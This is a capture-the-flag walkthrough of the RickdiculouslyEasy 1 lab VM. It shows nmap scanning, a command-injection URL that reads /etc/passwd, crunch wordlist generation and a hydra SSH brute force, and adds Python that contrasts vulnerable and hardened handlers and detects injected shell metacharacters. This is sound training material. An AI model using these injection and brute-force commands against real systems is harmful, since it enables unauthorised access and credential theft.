RickdiculouslyEasy 1: CTF walkthrough

Introduction

Name: RickdiculouslyEasy: 1

Date of release: 21 Sep 2017

Author: Luke

Series: RickdiculouslyEasy


Reconnaissance

We scan our local network with arp-scan to find the IP address of the vulnerable system.

Next, we use nmap to find all open ports and the services behind them.

[email protected]:~/Desktop# nmap -A -O -p- -T5 --reason 192.168.1.45

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-14 17:53 CEST
Warning: 192.168.1.45 giving up on port because retransmission cap hit (2).
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.59% done; ETC: 17:56 (0:00:09 remaining)
Nmap scan report for pc-246.home (192.168.1.45)
Host is up, received arp-response (0.011s latency).
Not shown: 65455 closed ports, 73 filtered ports
Reason: 65455 resets and 73 no-responses
PORT      STATE SERVICE REASON         VERSION
21/tcp    open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?    syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    syn-ack ttl 64 Cockpit web service
|_http-title: Did not follow redirect to https://pc-246.home:9090/
13337/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=10/14%Time=59E233EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.
SF:4\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.60%I=7%D=10/14%Time=59E233EA%P=x86_64-pc-linux-gnu%r(
SF:NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.60%I=7%D=10/14%Time=59E233F0%P=x86_64-pc-linux-gnu%r(
SF:NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\
SF:.\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20r
SF:everse\x20shell\.\.\.\n#\x20");
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   11.19 ms pc-246.home (192.168.1.45)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.46 seconds
[email protected]:~/Desktop#


FTP Service

An FTP service with anonymous login enabled is accessible. Logging in anonymously shows the FLAG.txt file already listed by nmap's ftp-anon script.

Note that the pub directory is empty.

First flag: FLAG{Whoa this is unexpected} – 10 Points

10 out of 130.


Cockpit Web Service

An HTTP service (Cockpit) runs on an uncommon port; let's check it.

Second flag: FLAG{There is no Zeus, in your face!} – 10 Points

20 out of 130.


Unknown Port 13337

We found an open port, let’s try to connect to it.

[email protected]:~/Desktop# nc -nvv 192.168.1.45 13337
(UNKNOWN) [192.168.1.45] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points
 sent 0, rcvd 41
[email protected]:~/Desktop#

No more, no less.

Third flag: FLAG:{TheyFoundMyBackDoorMorty}-10Points

30 out of 130.


Unknown Port 60000

A bind shell publicly accessible? Interesting.

[email protected]:~/Desktop# nc -nvv 192.168.1.45 60000
(UNKNOWN) [192.168.1.45] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt    
FLAG{Flip the pickle Morty!} - 10 Points 
#

It is a shell in a highly restricted environment, so only a few commands are usable, such as ls, cat or whoami.

Fourth flag: FLAG{Flip the pickle Morty!} – 10 Points

40 out of 130.


‘Main’ Website

OK, this time we have a real website. First, the robots.txt file gives us some interesting information about the /cgi-bin/ directory: two tools seem to be available.

[email protected]:~/Desktop# curl http://192.168.1.45/robots.txt
They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
[email protected]:~/Desktop#

We can also use gobuster to find the /passwords directory.

Let’s see what we can find in this directory.

[email protected]:~/Desktop# curl http://192.168.1.45/passwords/FLAG.txt
FLAG{Yeah d- just don't do it.} - 10 Points
[email protected]:~/Desktop#

Moreover, we can find a password hidden in the source code.

[email protected]:~/Desktop# curl http://192.168.1.45/passwords/passwords.html
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
[email protected]:~/Desktop#

Fifth flag: FLAG{Yeah d- just don’t do it.} – 10 Points

Our next step is the /cgi-bin directory. The first tool, root_shell.cgi, is a waste of time, but the second one lets us run tracert via an HTML form.

This tool has an easy-to-find command injection vulnerability: the ip parameter is passed to a shell unsanitized, so appending a ; followed by another command lets us execute commands remotely on the server.

Let's enumerate the system and read files.

We will see that the cat command is unusable; fortunately for us, other commands can be used to read the content of a file, such as less or more. Because less is more, let's try to read the /etc/passwd file with the less command.

[email protected]:/var/www/html# curl "http://192.168.1.45/cgi-bin/tracertool.cgi?ip=127.0.0.1%3Bless+%2Fetc%2Fpasswd"
[..snip..]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:995:993::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
[..snip..]
[email protected]:/var/www/html#
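As an added example (not the CGI script from the VM, whose source is not shown), here is the shape of the defect in Python beside its fix, plus the check a defender would run over the web server's access log: the vulnerable handler splices the ip parameter into a shell command line, the hardened one validates it as an IP literal and calls traceroute with an argv list, and the detector URL-decodes a query string and flags shell metacharacters. The function names, the traceroute program and the IP-only policy are assumptions.

```python
import ipaddress
import subprocess
from urllib.parse import unquote_plus

# Constructed input: the walkthrough's payload, URL-decoded as the server sees it.
INJECTED = "127.0.0.1;less /etc/passwd"


def vulnerable_command(ip: str) -> str:
    """Mirrors the flaw: the parameter is spliced into a shell command line.
    Returned as a string and never executed here, so the defect is visible:
    ';' terminates traceroute and starts a second command."""
    return "traceroute " + ip


def hardened_argv(ip: str) -> list:
    """Validate the parameter as an IP address literal (assumed policy) and
    hand it to the program as one argv element, so no shell ever parses it."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        raise ValueError("ip parameter is not an IP address literal")
    return ["traceroute", str(addr)]


def run_traceroute(ip: str, timeout: int = 30) -> str:
    """Execute with an argv list (no shell=True); metacharacters are inert."""
    proc = subprocess.run(hardened_argv(ip), capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout


# Detection: metacharacters a legitimate ip= value never contains.
SHELL_META = set(";|&`$(){}<>\n")


def suspicious_query(raw_query: str) -> bool:
    """URL-decode a logged query string the way the server would and flag
    shell metacharacters, e.g. the %3B in the walkthrough's request."""
    return any(c in SHELL_META for c in unquote_plus(raw_query))


if __name__ == "__main__":
    print("vulnerable command line:", vulnerable_command(INJECTED))
    try:
        hardened_argv(INJECTED)
    except ValueError as err:
        print("hardened handler rejected it:", err)
    print("accepted:", hardened_argv("127.0.0.1"))
    print("log hit:", suspicious_query("ip=127.0.0.1%3Bless+%2Fetc%2Fpasswd"))
```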

We have three regular users: RickSanchez, Morty and Summer.

Let's try the previously found password with each one.

[email protected]:/var/www/html# ssh Summer@192.168.1.45 -p 22222
[email protected]'s password: 
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[[email protected] ~]$ id
uid=1002(Summer) gid=1002(Summer) groups=1002(Summer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[[email protected] ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[[email protected] ~]$ cat FLAG.txt
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

[[email protected] ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[[email protected] ~]$

Sixth flag: FLAG{Get off the high road Summer!} – 10 Points

60 out of 130.


Morty Home Folder

We are in the system and we know of three users; let's look at Morty's home directory.

[[email protected] Morty]$ ls -la
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15 11:49 .
drwxr-xr-x. 5 root  root     52 Aug 18 18:20 ..
-rw-------. 1 Morty Morty     1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30 14:53 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22 03:06 journal.txt.zip
-rw-r--r--. 1 root  root  43145 Aug 22 03:04 Safe_Password.jpg
[[email protected] Morty]$

We have a password-protected zip file and a password stored in a JPG file called Safe_Password.jpg.

Actually, it is neither safe nor protected: the picture simply shows the password.

The password is: Meeseek.

We are now able to unzip the file.

[[email protected] Morty]$ unzip journal.txt.zip -d /tmp/
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password: 
  inflating: /tmp/journal.txt        
[[email protected] Morty]$ more /tmp/journal.txt 
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade pain
t solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was 
a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
[[email protected] Morty]$

Seventh flag: FLAG: {131333} – 20 Points

80 out of 130.


Rick Home Folder

The content of Rick's home folder:

[[email protected] RickSanchez]$ ls -lahR
.:
total 12K
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .
drwxr-xr-x. 5 root        root         52 Aug 18 18:20 ..
-rw-r--r--. 1 RickSanchez RickSanchez  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 RickSanchez RickSanchez 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 RickSanchez RickSanchez 231 May 30 14:53 .bashrc
drwxr-xr-x. 2 RickSanchez RickSanchez  18 Sep 21 09:50 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 ThisDoesntContainAnyFlags

./RICKS_SAFE:
total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe

./ThisDoesntContainAnyFlags:
total 4.0K
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 ..
-rw-rw-r--. 1 RickSanchez RickSanchez  95 Aug 18 20:26 NotAFlag.txt
[[email protected] RickSanchez]$

As we can see, we have an ELF binary called safe.

Let's copy this binary to our Linux machine.

[[email protected] RickSanchez]$ exit
logout
Connection to 192.168.1.45 closed.
[email protected]:~/Desktop# 
[email protected]:~/Desktop# scp -P22222 [email protected]:/home/RickSanchez/RICKS_SAFE/safe .
[email protected]'s password: 
safe                                                                  100% 8704   845.6KB/s   00:00    
[email protected]:~/Desktop#

We run the binary; apparently it needs a command-line argument.

[email protected]:~/Desktop# ./safe 
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[email protected]:~/Desktop#

Let's try it with the previously found hint.

[email protected]:~/Desktop# ./safe 131333
decrypt:     FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.
[email protected]:~/Desktop#

Now we have to find Rick's password.

Eighth flag: FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

100 out of 130.


Rick’s Password

One of the best tools installed on Kali Linux for password generation is crunch. This is the tool I will use for Rick's password. So, we need one uppercase character, one digit and one word from the old band's name.

  • If, like me, you didn’t watch the show: you can find the name here: http://rickandmorty.wikia.com/wiki/The_Flesh_Curtains

According to crunch's man page, we can specify the desired pattern as well as the minimum and maximum length.

DESCRIPTION
       Crunch  can  create  a  wordlist based on criteria you specify.  The output from crunch can be
       sent to the screen, file, or to another program.  The required parameters are:

       min-len
              The minimum length string you want crunch to start at.  This option  is  required  even
              for parameters that won't use the value.

       max-len
              The  maximum length string you want crunch to end at.  This option is required even for
              parameters that won't use the value.

       charset string

[..snip..]

        -t @,%^
              Specifies  a  pattern,  eg:  @@god@@@@  where  the only the @'s, ,'s, %'s, and ^'s will
              change.
              @ will insert lower case characters
              , will insert upper case characters
              % will insert numbers
              ^ will insert symbols

We can generate two dictionaries, one with the word Flesh and another one with the word Curtains.

[email protected]:~/Desktop# crunch 7 7 -t ,%Flesh -o flesh.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
[email protected]:~/Desktop# crunch 10 10 -t ,%Curtains -o curtains.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
[email protected]:~/Desktop#

Finally we can use hydra for a dictionary attack on the SSH service.

[email protected]:~/Desktop# hydra -l RickSanchez -P merged.txt ssh://192.168.1.45 -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-14 22:40:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 780 login tries (l:1/p:780), ~49 tries per task
[DATA] attacking ssh://192.168.1.45:22222/
[22222][ssh] host: 192.168.1.45   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-14 22:41:18
[email protected]:~/Desktop#

Fortunately for us, the merged file (both generated dictionaries) contains only 780 entries, and in less than a minute we find Rick's password.

Username: RickSanchez
Password: P7Curtains
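To show why the hint makes this brute force cheap, here is an added example (not part of the original walkthrough or of crunch) that reproduces crunch's count for a -t pattern and checks whether a password fits the hint: each pattern above is 26 uppercase letters times 10 digits, i.e. the 260 lines crunch reported per file. The charset sizes assume crunch's defaults for @, , and %; ^ (symbols) is left out because its default set is not on the page.

```python
import re
from math import prod

# Placeholder -> (regex class, charset size); assumed crunch defaults.
PLACEHOLDERS = {
    "@": ("[a-z]", 26),   # lower case characters
    ",": ("[A-Z]", 26),   # upper case characters
    "%": ("[0-9]", 10),   # numbers
}


def pattern_to_regex(pattern: str) -> "re.Pattern":
    """Compile a crunch -t pattern into an anchored regex.
    Placeholder characters become classes; everything else stays literal."""
    parts = []
    for ch in pattern:
        if ch in PLACEHOLDERS:
            parts.append(PLACEHOLDERS[ch][0])
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$")


def keyspace_size(pattern: str) -> int:
    """Number of candidates crunch will emit for the pattern: the product
    of the charset sizes of its placeholders (literals contribute 1)."""
    return prod(PLACEHOLDERS[ch][1] for ch in pattern if ch in PLACEHOLDERS)


def matches_hint(pattern: str, password: str) -> bool:
    """True when the password is one of the candidates the pattern covers,
    i.e. it follows the leaked 'uppercase, digit, band word' rule."""
    return pattern_to_regex(pattern).match(password) is not None


if __name__ == "__main__":
    for pat in (",%Flesh", ",%Curtains"):
        print(pat, "->", keyspace_size(pat), "candidates")   # 260 each
    print(matches_hint(",%Curtains", "P7Curtains"))          # True
```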


Last Flag

For this last flag, we don't need a tricky hack or a complex exploit. Always think of the basics first.

Rick's hint said "sudo is wheely good", so he is presumably in the wheel group and can use sudo; we only need to switch to root with the sudo command.

[email protected]:~/Desktop# ssh RickSanchez@192.168.1.45 -p 22222
[email protected]'s password: 
Last login: Sun Oct 15 07:44:36 2017 from 192.168.1.107
[[email protected] ~]$ sudo su
[sudo] password for RickSanchez: 
[[email protected] RickSanchez]# 
[[email protected] RickSanchez]# more /root/FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points
[[email protected] RickSanchez]#

In a few seconds we have root access to the system and the last flag.

Ninth flag: FLAG: {Ionic Defibrillator} – 30 points
